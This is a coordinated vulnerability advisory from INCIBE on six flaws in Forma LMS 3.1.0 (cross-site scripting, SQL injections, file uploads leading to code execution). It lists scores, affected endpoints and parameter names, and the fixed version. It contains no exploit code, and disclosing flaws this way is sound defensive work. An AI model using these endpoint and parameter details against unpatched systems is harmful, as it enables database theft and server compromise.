Multiple vulnerabilities in Forma LMS

Posted date 25/10/2022
Importance
5 - Critical
Affected Resources

Forma LMS, version 3.1.0.

Description

INCIBE has coordinated the publication of 6 vulnerabilities in Forma LMS, which has been discovered by Tin Pham aka 'TF1T'.

These vulnerabilities have been assigned the following codes:

  • CVE-2022-41679. A CVSS v3.1 base score of 4,7 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N. The vulnerability type is CWE-79: improper neutralization of input during web page generation (Cross-site Scripting).
  • CVE-2022-41680. A CVSS v3.1 base score of 7,6 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-41681. A CVSS v3.1 base score of 9,9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. The vulnerability type is CWE-434: unrestricted upload of file with dangerous type.
  • CVE-2022-42923. A CVSS v3.1 base score of 8,3 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-42924. A CVSS v3.1 base score of 7,6 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L. The vulnerability type is CWE-89: improper neutralization of special elements used in an SQL command (SQL injection).
  • CVE-2022-42925. A CVSS v3.1 base score of 9,9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. The vulnerability type is CWE-434: unrestricted upload of file with dangerous type.
Solution

These vulnerabilities have been solved by Forma in LMS version 3.2.1.

Detail
  • CVE-2022-41679: Forma LMS version 3.1.0 and earlier are affected by an Cross-Site scripting vulnerability, that could allow a remote attacker to inject JavaScript code on the 'back_url' parameter in 'appLms/index.php?modname=faq&op=play' function. The exploitation of this vulnerability could allow an attacker to steal the user´s cookies in order to log in to the application.
  • CVE-2022-41680: Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'search[value] parameter in the appLms/ajax.server.php?r=mycertificate/getMyCertificates' function in order to dump the entire database.
  • CVE-2022-41681: there is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the SCORM importer feature. The exploitation of this vulnerability could lead to a remote code injection.
  • CVE-2022-42923: Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'id' parameter in the 'appCore/index.php?r=adm/mediagallery/delete' function in order to dump the entire database or delete all contents from the 'core_user_file' table.
  • CVE-2022-42924: Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'dyn_filter' parameter in the 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' function in order to dump the entire database.
  • CVE-2022-42925: there is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the plugin upload component. The exploitation of this vulnerability could lead to a remote code injection.

If you have any information regarding this advisory, please contact INCIBE as indicated in the CVE assignment and publication.

Encuesta valoración

References list
Product sheet
Patch notes
Etiquetas